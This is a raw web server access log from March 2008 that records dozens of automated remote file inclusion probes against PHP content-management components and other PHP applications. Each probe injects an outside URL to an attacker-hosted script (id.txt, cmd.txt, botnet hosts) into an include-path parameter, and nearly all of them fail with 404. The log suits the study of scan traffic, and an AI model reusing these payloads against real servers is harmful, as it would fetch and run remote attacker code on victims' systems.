74.86.69.34 - - [04/Mar/2008:07:08:17 -0800] "GET /index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.usa-westen.info/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.86.69.34 - - [04/Mar/2008:07:08:17 -0800] "GET /logs/index.php?option=com_sef&Itemid=&mosConfig_absolute_path=http://www.usa-westen.info/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.250.95.201 - - [04/Mar/2008:07:08:23 -0800] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://servicesbrazil.net/scan/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.29.145.12 - - [04/Mar/2008:07:08:32 -0800] "GET /tools/send_reminders.php?noSet=0&includedir=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
58.29.145.12 - - [04/Mar/2008:07:08:32 -0800] "GET /logs/tools/send_reminders.php?noSet=0&includedir=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
219.166.61.155 - - [04/Mar/2008:07:09:28 -0800] "GET /logs/doceboCms/class/class.dashboard_cms.php?where_framework=http://www.freewebtown.com/indoirc/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
219.166.61.155 - - [04/Mar/2008:07:09:28 -0800] "GET /doceboCms/class/class.dashboard_cms.php?where_framework=http://www.freewebtown.com/indoirc/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.dmulk.com"
208.67.83.25 - - [04/Mar/2008:07:09:42 -0800] "GET /logs/access_080124.log/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
208.67.83.25 - - [04/Mar/2008:07:09:42 -0800] "GET /logs/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
216.55.147.205 - - [04/Mar/2008:07:10:24 -0800] "GET /logs/access_080126.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.55.147.205 - - [04/Mar/2008:07:10:24 -0800] "GET //components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
216.55.147.205 - - [04/Mar/2008:07:10:24 -0800] "GET /logs//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.ar-vision.com/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.25.197.114 - - [04/Mar/2008:07:10:41 -0800] "GET /logs/access.log/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.25.197.114 - - [04/Mar/2008:07:10:41 -0800] "GET /logs/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
193.25.197.114 - - [04/Mar/2008:07:10:42 -0800] "GET /logs/access_080201.log/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.62.67.82 - - [04/Mar/2008:07:10:53 -0800] "GET /logs/access_080208.log//index.php?body=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.62.67.82 - - [04/Mar/2008:07:11:01 -0800] "GET /logs/access_080108.log/convert/mvcw.php?vwar_root=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.62.67.82 - - [04/Mar/2008:07:11:03 -0800] "GET //index.php?body=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
209.62.67.82 - - [04/Mar/2008:07:11:05 -0800] "GET /logs//index.php?body=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.250.95.201 - - [04/Mar/2008:07:11:06 -0800] "GET /logs/access_080105.log/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://servicesbrazil.net/scan/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
69.13.1.1 - - [04/Mar/2008:07:11:25 -0800] "GET /logs/access_080216.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://docuweb.docustar.com//dotproject/includes/safe.txt? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
208.67.83.25 - - [04/Mar/2008:07:11:50 -0800] "GET /logs/access.log/administrator/components/com_mosmedia/includes/purchase.html.php?mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
71.6.167.234 - - [04/Mar/2008:07:12:01 -0800] "GET /logs/SQuery/lib/gameSpy.php?libpath=http://www.nedaleko.ru/en/img/contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.dmulk.com"
71.6.167.234 - - [04/Mar/2008:07:12:01 -0800] "GET /SQuery/lib/gameSpy.php?libpath=http://www.nedaleko.ru/en/img/contr.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
216.127.68.128 - - [04/Mar/2008:07:12:55 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://webmail.asl3.umbria.it/admin/inc/albania.txt????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.127.68.128 - - [04/Mar/2008:07:12:55 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://webmail.asl3.umbria.it/admin/inc/albania.txt????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
87.230.79.168 - - [04/Mar/2008:07:13:14 -0800] "GET /logs/access_080131.log//main.php?sayfa=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.79.168 - - [04/Mar/2008:07:13:15 -0800] "GET //main.php?sayfa=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.79.168 - - [04/Mar/2008:07:13:15 -0800] "GET /logs//main.php?sayfa=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.127.68.128 - - [04/Mar/2008:07:13:16 -0800] "GET /logs/access_080124.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://botnet.y0.pl/...../albania_ch.txt????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.127.68.128 - - [04/Mar/2008:07:13:16 -0800] "GET //components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://botnet.y0.pl/...../albania_ch.txt????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.127.68.128 - - [04/Mar/2008:07:13:16 -0800] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://botnet.y0.pl/...../albania_ch.txt????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.18.66 - - [04/Mar/2008:07:13:45 -0800] "GET /logs//addpost_newpoll.php?addpoll=preview&thispath=http://shadowstargames.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
67.19.18.66 - - [04/Mar/2008:07:13:45 -0800] "GET //addpost_newpoll.php?addpoll=preview&thispath=http://shadowstargames.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
87.230.79.168 - - [04/Mar/2008:07:13:50 -0800] "GET /logs/access_080221.log//main.php?sayfa=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.19.18.66 - - [04/Mar/2008:07:14:16 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://shadowstargames.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
67.19.18.66 - - [04/Mar/2008:07:14:16 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://shadowstargames.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
216.75.63.66 - - [04/Mar/2008:07:14:31 -0800] "GET /logs/access_080211.log//modules/agendax/addevent.inc.php?agendax_path=http://www.napopwin.com.tw/mambots/search/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.75.63.66 - - [04/Mar/2008:07:14:31 -0800] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.napopwin.com.tw/mambots/search/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.75.63.66 - - [04/Mar/2008:07:14:31 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.napopwin.com.tw/mambots/search/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.144.182 - - [04/Mar/2008:07:14:32 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
85.25.144.182 - - [04/Mar/2008:07:14:32 -0800] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Microsoft Internet Explorer/4.0b1 (Windows 95)" "www.dmulk.com"
213.83.47.82 - - [04/Mar/2008:07:14:37 -0800] "GET /!scanhttp://www.cteng.co.uk/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.79.168 - - [04/Mar/2008:07:14:48 -0800] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.79.168 - - [04/Mar/2008:07:14:48 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.79.168 - - [04/Mar/2008:07:14:49 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.127.68.128 - - [04/Mar/2008:07:14:59 -0800] "GET /logs/access_080126.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://botnet.y0.pl/...../albania_ch.txt????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.127.68.128 - - [04/Mar/2008:07:14:59 -0800] "GET //components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://botnet.y0.pl/...../albania_ch.txt????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.127.68.128 - - [04/Mar/2008:07:15:01 -0800] "GET /logs//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://botnet.y0.pl/...../albania_ch.txt????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
66.90.73.122 - - [04/Mar/2008:07:15:10 -0800] "GET /logs/access.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://geocities.com/devayudistira/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.90.73.122 - - [04/Mar/2008:07:15:10 -0800] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://geocities.com/devayudistira/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
66.90.73.122 - - [04/Mar/2008:07:15:11 -0800] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://geocities.com/devayudistira/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.25.68.146 - - [04/Mar/2008:07:15:12 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://paginas.terra.com.br/lazer/xfatalx/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.dmulk.com"
81.25.68.146 - - [04/Mar/2008:07:15:12 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://paginas.terra.com.br/lazer/xfatalx/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
193.136.6.38 - - [04/Mar/2008:07:15:14 -0800] "GET //modules/agendax/addevent.inc.php?agendax_path=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
193.136.6.38 - - [04/Mar/2008:07:15:14 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://www.avsvpt.org/phpBB2/templates/fisubsilversh/admin/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
220.80.107.11 - - [04/Mar/2008:07:15:28 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
220.80.107.11 - - [04/Mar/2008:07:15:28 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://privus.host.sk/test1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
213.83.47.82 - - [04/Mar/2008:07:15:36 -0800] "GET /logs/access_080120.log/!scanhttp://www.kapanakuke.com/dyingdevil.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.83.47.82 - - [04/Mar/2008:07:15:36 -0800] "GET /!scanhttp://www.kapanakuke.com/dyingdevil.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.83.47.82 - - [04/Mar/2008:07:15:37 -0800] "GET /logs/!scanhttp://www.kapanakuke.com/dyingdevil.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.83.47.82 - - [04/Mar/2008:07:15:37 -0800] "GET /logs/access_071228.log/!scanhttp://www.kapanakuke.com/dyingdevil.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.18.66 - - [04/Mar/2008:07:15:40 -0800] "GET /logs/access_080131.log//main.php?sayfa=http://albinfo.freehostia.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [04/Mar/2008:07:15:40 -0800] "GET //main.php?sayfa=http://albinfo.freehostia.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [04/Mar/2008:07:15:40 -0800] "GET /logs//main.php?sayfa=http://albinfo.freehostia.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [04/Mar/2008:07:15:51 -0800] "GET /logs/access_080221.log//main.php?sayfa=http://albinfo.freehostia.com/z.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.19.151.78 - - [04/Mar/2008:07:16:08 -0800] "GET /logs/access_080211.log//modules/agendax/addevent.inc.php?agendax_path=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.19.151.78 - - [04/Mar/2008:07:16:08 -0800] "GET //modules/agendax/addevent.inc.php?agendax_path=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.19.151.78 - - [04/Mar/2008:07:16:09 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
72.30.216.102 - - [04/Mar/2008:07:16:13 -0800] "GET /logs/access_080118.log HTTP/1.0" 200 561818 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
213.203.223.59 - - [04/Mar/2008:07:16:32 -0800] "GET /logs/access_080211.log//modules/agendax/addevent.inc.php?agendax_path=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.59 - - [04/Mar/2008:07:16:32 -0800] "GET //modules/agendax/addevent.inc.php?agendax_path=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.203.223.59 - - [04/Mar/2008:07:16:33 -0800] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://elurbano.com/elurbano/administrator/components/com_typedcontent/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.83.47.82 - - [04/Mar/2008:07:16:41 -0800] "GET /logs/access_080208.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.kapanakuke.com/dyingdevil.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.83.47.82 - - [04/Mar/2008:07:16:41 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.kapanakuke.com/dyingdevil.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.83.47.82 - - [04/Mar/2008:07:16:41 -0800] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.kapanakuke.com/dyingdevil.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.83.47.82 - - [04/Mar/2008:07:16:42 -0800] "GET /logs/access_080131.log//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.kapanakuke.com/dyingdevil.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.18.66 - - [04/Mar/2008:07:16:45 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://hornydate.co.uk/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
211.233.7.68 - - [04/Mar/2008:07:16:55 -0800] "GET /config.inc.php?path_escape=http://www.geocities.com/tomohonhack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
211.233.7.68 - - [04/Mar/2008:07:16:55 -0800] "GET /logs/config.inc.php?path_escape=http://www.geocities.com/tomohonhack/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
89.17.201.147 - - [04/Mar/2008:07:17:00 -0800] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://servicesbrazil.net/scan/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.17.201.147 - - [04/Mar/2008:07:17:01 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://servicesbrazil.net/scan/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
89.17.201.147 - - [04/Mar/2008:07:17:01 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://servicesbrazil.net/scan/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
201.77.209.86 - - [04/Mar/2008:07:17:29 -0800] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://servicesbrazil.net/scan/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.77.209.86 - - [04/Mar/2008:07:17:29 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://servicesbrazil.net/scan/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
201.77.209.86 - - [04/Mar/2008:07:17:29 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://servicesbrazil.net/scan/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.21.134.242 - - [04/Mar/2008:07:18:01 -0800] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://luminaldemon.altervista.org/img/cmd.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
85.21.134.242 - - [04/Mar/2008:07:18:01 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://luminaldemon.altervista.org/img/cmd.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
216.127.68.128 - - [04/Mar/2008:07:18:12 -0800] "GET /logs/access_080127.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.jonesmkt.com/shop/images/gt_interactive/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.127.68.128 - - [04/Mar/2008:07:18:17 -0800] "GET /logs/access_080127.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.jonesmkt.com/shop/images/gt_interactive/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.19.18.66 - - [04/Mar/2008:07:18:52 -0800] "GET /logs//tools/send_reminders.php?includedir=http://shadowstargames.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
67.19.18.66 - - [04/Mar/2008:07:18:52 -0800] "GET //tools/send_reminders.php?includedir=http://shadowstargames.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
67.19.18.66 - - [04/Mar/2008:07:19:03 -0800] "GET //skin/zero_vote/error.php?dir=http://hornydate.co.uk/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [04/Mar/2008:07:19:06 -0800] "GET //index.php?pageurl=http://shadowstargames.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
67.19.18.66 - - [04/Mar/2008:07:19:06 -0800] "GET /logs//index.php?pageurl=http://shadowstargames.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
87.230.79.168 - - [04/Mar/2008:07:19:11 -0800] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.79.168 - - [04/Mar/2008:07:19:11 -0800] "GET //skin/zero_vote/error.php?dir=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.79.168 - - [04/Mar/2008:07:19:13 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
216.127.68.128 - - [04/Mar/2008:07:19:31 -0800] "GET //components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.freewebtown.com/civiclx/echo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.83.47.82 - - [04/Mar/2008:07:19:32 -0800] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.cteng.co.uk/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.18.66 - - [04/Mar/2008:07:19:39 -0800] "GET //skin/zero_vote/error.php?dir=http://hornydate.co.uk/sys.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
61.250.95.201 - - [04/Mar/2008:07:20:00 -0800] "GET /logs/access_071222.log//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://servicesbrazil.net/scan/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.250.95.201 - - [04/Mar/2008:07:20:00 -0800] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://servicesbrazil.net/scan/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.19.18.66 - - [04/Mar/2008:07:20:08 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://albinfo.freehostia.com/z.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
87.230.79.168 - - [04/Mar/2008:07:20:40 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.155.165.40 - - [04/Mar/2008:07:20:50 -0800] "GET /logs/access.log//include.php?path[docroot]=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
67.19.18.66 - - [04/Mar/2008:07:20:51 -0800] "GET /logs/access_080129.log//skin/zero_vote/error.php?dir=http://albinfo.freehostia.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [04/Mar/2008:07:20:51 -0800] "GET //skin/zero_vote/error.php?dir=http://albinfo.freehostia.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.19.18.66 - - [04/Mar/2008:07:20:51 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://albinfo.freehostia.com/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.155.165.40 - - [04/Mar/2008:07:20:53 -0800] "GET //include.php?path[docroot]=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.155.165.40 - - [04/Mar/2008:07:20:57 -0800] "GET /logs//include.php?path[docroot]=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.62.67.82 - - [04/Mar/2008:07:22:00 -0800] "GET /logs/access_080201.log//modules/vwar/admin/admin.php?vwar_root=http://www.ssdsa.org/calendar//tools/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
